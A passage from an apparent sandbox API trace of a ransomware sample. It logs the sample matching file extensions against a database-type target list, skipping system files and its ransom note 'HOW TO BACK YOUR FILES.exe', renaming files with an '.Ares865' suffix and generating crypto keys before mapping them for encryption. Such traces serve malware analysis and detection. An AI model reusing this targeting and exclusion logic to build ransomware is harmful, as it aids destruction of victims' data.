lstrlenW (lpString="dbf") returned 3 [0087.507] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0087.507] lstrlenW (lpString="mdf") returned 3 [0087.507] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0087.507] lstrlenW (lpString="mdb") returned 3 [0087.507] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0087.507] lstrlenW (lpString="sql") returned 3 [0087.507] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0087.507] lstrlenW (lpString="sqlite") returned 6 [0087.507] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0087.507] lstrlenW (lpString="sqlite3") returned 7 [0087.507] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0087.507] lstrlenW (lpString="sqlitedb") returned 8 [0087.507] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0087.507] lstrlenW (lpString="xml") returned 3 [0087.507] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0087.507] lstrlenW (lpString="$er") returned 3 [0087.507] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0087.507] lstrlenW (lpString="4dd") returned 3 [0087.507] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0087.507] lstrlenW (lpString="4dl") returned 3 [0087.507] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0087.507] lstrlenW (lpString="^^^") returned 3 [0087.507] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0087.507] lstrlenW (lpString="abs") returned 3 [0087.508] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0087.508] lstrlenW (lpString="abx") returned 3 [0087.508] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0087.508] lstrlenW (lpString="accdb") returned 5 [0087.508] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0087.508] lstrlenW (lpString="accdc") returned 5 [0087.508] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0087.508] lstrlenW (lpString="accde") returned 5 [0087.508] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0087.508] lstrlenW (lpString="accdr") returned 5 [0087.508] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0087.508] lstrlenW (lpString="accdt") returned 5 [0087.508] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0087.508] lstrlenW (lpString="accdw") returned 5 [0087.508] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0087.508] lstrlenW (lpString="accft") returned 5 [0087.508] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0087.508] lstrlenW (lpString="adb") returned 3 [0087.508] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.508] lstrlenW (lpString="adb") returned 3 [0087.508] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.508] lstrlenW (lpString="ade") returned 3 [0087.508] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0087.508] lstrlenW (lpString="adf") returned 3 [0087.508] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0087.508] lstrlenW (lpString="adn") returned 3 [0087.508] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0087.508] lstrlenW (lpString="adp") returned 3 [0087.508] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0087.508] lstrlenW (lpString="alf") returned 3 [0087.508] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0087.508] lstrlenW (lpString="ask") returned 3 [0087.508] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0087.508] lstrlenW (lpString="btr") returned 3 [0087.508] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0087.508] lstrlenW (lpString="cat") returned 3 [0087.508] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0087.508] lstrlenW (lpString="cdb") returned 3 [0087.509] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0087.509] lstrlenW (lpString="ckp") returned 3 [0087.509] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0087.509] lstrlenW (lpString="cma") returned 3 [0087.509] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0087.509] lstrlenW (lpString="cpd") returned 3 [0087.509] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0087.509] lstrlenW (lpString="dacpac") returned 6 [0087.509] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0087.509] lstrlenW (lpString="dad") returned 3 [0087.509] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0087.509] lstrlenW (lpString="dadiagrams") returned 10 [0087.509] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0087.509] lstrlenW (lpString="daschema") returned 8 [0087.509] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0087.509] lstrlenW (lpString="db-journal") returned 10 [0087.509] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0087.509] lstrlenW (lpString="db-shm") returned 6 [0087.509] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0087.509] lstrlenW (lpString="db-wal") returned 6 [0087.509] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0087.509] lstrlenW (lpString="dbc") returned 3 [0087.509] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0087.509] lstrlenW (lpString="dbs") returned 3 [0087.509] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0087.509] lstrlenW (lpString="dbt") returned 3 [0087.509] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0087.509] lstrlenW (lpString="dbv") returned 3 [0087.509] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0087.509] lstrlenW (lpString="dbx") returned 3 [0087.509] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0087.509] lstrlenW (lpString="dcb") returned 3 [0087.509] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0087.509] lstrlenW (lpString="dct") returned 3 [0087.509] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0087.509] lstrlenW (lpString="dcx") returned 3 [0087.509] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0087.509] lstrlenW (lpString="ddl") returned 3 [0087.509] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0087.510] lstrlenW (lpString="dlis") returned 4 [0087.510] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0087.510] lstrlenW (lpString="dp1") returned 3 [0087.510] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0087.510] lstrlenW (lpString="dqy") returned 3 [0087.510] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0087.510] lstrlenW (lpString="dsk") returned 3 [0087.510] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0087.510] lstrlenW (lpString="dsn") returned 3 [0087.510] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0087.510] lstrlenW (lpString="dtsx") returned 4 [0087.510] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0087.510] lstrlenW (lpString="dxl") returned 3 [0087.510] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0087.510] lstrlenW (lpString="eco") returned 3 [0087.510] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0087.510] lstrlenW (lpString="ecx") returned 3 [0087.510] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0087.510] lstrlenW (lpString="edb") returned 3 [0087.510] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0087.510] lstrlenW (lpString="epim") returned 4 [0087.510] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0087.510] lstrlenW (lpString="fcd") returned 3 [0087.510] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0087.510] lstrlenW (lpString="fdb") returned 3 [0087.510] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0087.510] lstrlenW (lpString="fic") returned 3 [0087.510] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0087.510] lstrlenW (lpString="flexolibrary") returned 12 [0087.510] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0087.510] lstrlenW (lpString="fm5") returned 3 [0087.510] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0087.510] lstrlenW (lpString="fmp") returned 3 [0087.511] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0087.511] lstrlenW (lpString="fmp12") returned 5 [0087.511] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0087.511] lstrlenW (lpString="fmpsl") returned 5 [0087.511] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0087.511] lstrlenW (lpString="fol") returned 3 [0087.511] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0087.511] lstrlenW (lpString="fp3") returned 3 [0087.511] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0087.511] lstrlenW (lpString="fp4") returned 3 [0087.511] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0087.511] lstrlenW (lpString="fp5") returned 3 [0087.511] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0087.511] lstrlenW (lpString="fp7") returned 3 [0087.511] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0087.511] lstrlenW (lpString="fpt") returned 3 [0087.511] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0087.511] lstrlenW (lpString="frm") returned 3 [0087.511] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0087.511] lstrlenW (lpString="gdb") returned 3 [0087.511] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.511] lstrlenW (lpString="gdb") returned 3 [0087.511] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.511] lstrlenW (lpString="grdb") returned 4 [0087.511] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0087.511] lstrlenW (lpString="gwi") returned 3 [0087.511] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0087.511] lstrlenW (lpString="hdb") returned 3 [0087.511] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0087.511] lstrlenW (lpString="his") returned 3 [0087.511] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0087.511] lstrlenW (lpString="ib") returned 2 [0087.511] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0087.511] lstrlenW (lpString="idb") returned 3 [0087.511] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0087.511] lstrlenW (lpString="ihx") returned 3 [0087.511] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0087.511] lstrlenW (lpString="itdb") returned 4 [0087.512] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0087.512] lstrlenW (lpString="itw") returned 3 [0087.512] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0087.512] lstrlenW (lpString="jet") returned 3 [0087.512] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0087.512] lstrlenW (lpString="jtx") returned 3 [0087.512] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0087.512] lstrlenW (lpString="kdb") returned 3 [0087.512] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0087.512] lstrlenW (lpString="kexi") returned 4 [0087.512] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0087.512] lstrlenW (lpString="kexic") returned 5 [0087.512] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0087.512] lstrlenW (lpString="kexis") returned 5 [0087.512] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0087.512] lstrlenW (lpString="lgc") returned 3 [0087.512] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0087.512] lstrlenW (lpString="lwx") returned 3 [0087.512] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0087.512] lstrlenW (lpString="maf") returned 3 [0087.512] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0087.512] lstrlenW (lpString="maq") returned 3 [0087.512] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0087.512] lstrlenW (lpString="mar") returned 3 [0087.512] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0087.512] lstrlenW (lpString="marshal") returned 7 [0087.512] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0087.512] lstrlenW (lpString="mas") returned 3 [0087.512] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0087.512] lstrlenW (lpString="mav") returned 3 [0087.512] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0087.512] lstrlenW (lpString="maw") returned 3 [0087.512] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0087.512] lstrlenW (lpString="mdbhtml") returned 7 [0087.512] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0087.512] lstrlenW (lpString="mdn") returned 3 [0087.512] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0087.512] lstrlenW (lpString="mdt") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0087.513] lstrlenW (lpString="mfd") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0087.513] lstrlenW (lpString="mpd") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0087.513] lstrlenW (lpString="mrg") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0087.513] lstrlenW (lpString="mud") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0087.513] lstrlenW (lpString="mwb") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0087.513] lstrlenW (lpString="myd") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0087.513] lstrlenW (lpString="ndf") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0087.513] lstrlenW (lpString="nnt") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0087.513] lstrlenW (lpString="nrmlib") returned 6 [0087.513] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0087.513] lstrlenW (lpString="ns2") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0087.513] lstrlenW (lpString="ns3") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0087.513] lstrlenW (lpString="ns4") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0087.513] lstrlenW (lpString="nsf") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0087.513] lstrlenW (lpString="nv") returned 2 [0087.513] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0087.513] lstrlenW (lpString="nv2") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0087.513] lstrlenW (lpString="nwdb") returned 4 [0087.513] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0087.513] lstrlenW (lpString="nyf") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0087.513] lstrlenW (lpString="odb") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.513] lstrlenW (lpString="odb") returned 3 [0087.513] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.514] lstrlenW (lpString="oqy") returned 3 [0087.514] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0087.514] lstrlenW (lpString="ora") returned 3 [0087.514] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0087.514] lstrlenW (lpString="orx") returned 3 [0087.514] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0087.514] lstrlenW (lpString="owc") returned 3 [0087.514] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0087.514] lstrlenW (lpString="p96") returned 3 [0087.514] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0087.514] lstrlenW (lpString="p97") returned 3 [0087.514] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0087.514] lstrlenW (lpString="pan") returned 3 [0087.514] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0087.514] lstrlenW (lpString="pdb") returned 3 [0087.514] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0087.514] lstrlenW (lpString="pdm") returned 3 [0087.514] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0087.514] lstrlenW (lpString="pnz") returned 3 [0087.514] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0087.514] lstrlenW (lpString="qry") returned 3 [0087.514] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0087.514] lstrlenW (lpString="qvd") returned 3 [0087.514] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0087.514] lstrlenW (lpString="rbf") returned 3 [0087.514] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0087.514] lstrlenW (lpString="rctd") returned 4 [0087.514] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0087.514] lstrlenW (lpString="rod") returned 3 [0087.514] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0087.514] lstrlenW (lpString="rodx") returned 4 [0087.514] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0087.514] lstrlenW (lpString="rpd") returned 3 [0087.514] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0087.514] lstrlenW (lpString="rsd") returned 3 [0087.514] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0087.514] lstrlenW (lpString="sas7bdat") returned 8 [0087.514] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0087.515] lstrlenW (lpString="sbf") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0087.515] lstrlenW (lpString="scx") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0087.515] lstrlenW (lpString="sdb") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0087.515] lstrlenW (lpString="sdc") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0087.515] lstrlenW (lpString="sdf") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0087.515] lstrlenW (lpString="sis") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0087.515] lstrlenW (lpString="spq") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0087.515] lstrlenW (lpString="te") returned 2 [0087.515] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0087.515] lstrlenW (lpString="teacher") returned 7 [0087.515] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0087.515] lstrlenW (lpString="tmd") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0087.515] lstrlenW (lpString="tps") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0087.515] lstrlenW (lpString="trc") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.515] lstrlenW (lpString="trc") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.515] lstrlenW (lpString="trm") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0087.515] lstrlenW (lpString="udb") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0087.515] lstrlenW (lpString="udl") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0087.515] lstrlenW (lpString="usr") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0087.515] lstrlenW (lpString="v12") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0087.515] lstrlenW (lpString="vis") returned 3 [0087.515] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0087.516] lstrlenW (lpString="vpd") returned 3 [0087.516] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0087.516] lstrlenW (lpString="vvv") returned 3 [0087.516] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0087.516] lstrlenW (lpString="wdb") returned 3 [0087.516] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0087.516] lstrlenW (lpString="wmdb") returned 4 [0087.516] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0087.516] lstrlenW (lpString="wrk") returned 3 [0087.516] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0087.516] lstrlenW (lpString="xdb") returned 3 [0087.516] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0087.516] lstrlenW (lpString="xld") returned 3 [0087.516] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0087.516] lstrlenW (lpString="xmlff") returned 5 [0087.516] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0087.516] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.Ares865") returned 81 [0087.516] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0087.517] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0087.517] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=252256) returned 1 [0087.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0087.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0087.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0087.518] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0087.518] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0087.518] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.518] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3dc60, lpName=0x0) returned 0x15c [0087.520] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3dc60) returned 0x420000 [0087.534] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0087.535] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0087.535] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0087.535] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0087.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0087.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0087.535] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0087.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0087.535] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0087.535] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0087.535] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0087.535] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0087.535] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0087.538] CloseHandle (hObject=0x15c) returned 1 [0087.538] CloseHandle (hObject=0x118) returned 1 [0087.538] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0087.538] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0087.538] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0087.539] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c60f900, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0087.539] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0087.539] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1be9a700, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1be9a700, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x49f60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MAPIR.DLL.trx_dll", cAlternateFileName="MAPIRD~1.TRX")) returned 1 [0087.539] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0087.539] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0087.539] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2=".") returned 1 [0087.539] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="..") returned 1 [0087.539] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="windows") returned -1 [0087.539] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="bootmgr") returned 1 [0087.539] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="temp") returned -1 [0087.539] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="pagefile.sys") returned -1 [0087.539] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="boot") returned 1 [0087.539] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="ids.txt") returned 1 [0087.539] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="ntuser.dat") returned -1 [0087.539] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="perflogs") returned -1 [0087.539] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="MSBuild") returned -1 [0087.539] lstrlenW (lpString="MAPIR.DLL.trx_dll") returned 17 [0087.539] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll") returned 73 [0087.540] lstrcpyW (in: lpString1=0x2cce468, lpString2="MAPIR.DLL.trx_dll" | out: lpString1="MAPIR.DLL.trx_dll") returned="MAPIR.DLL.trx_dll" [0087.540] lstrlenW (lpString="MAPIR.DLL.trx_dll") returned 17 [0087.540] lstrlenW (lpString="Ares865") returned 7 [0087.540] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0087.540] lstrlenW (lpString=".dll") returned 4 [0087.540] lstrcmpiW 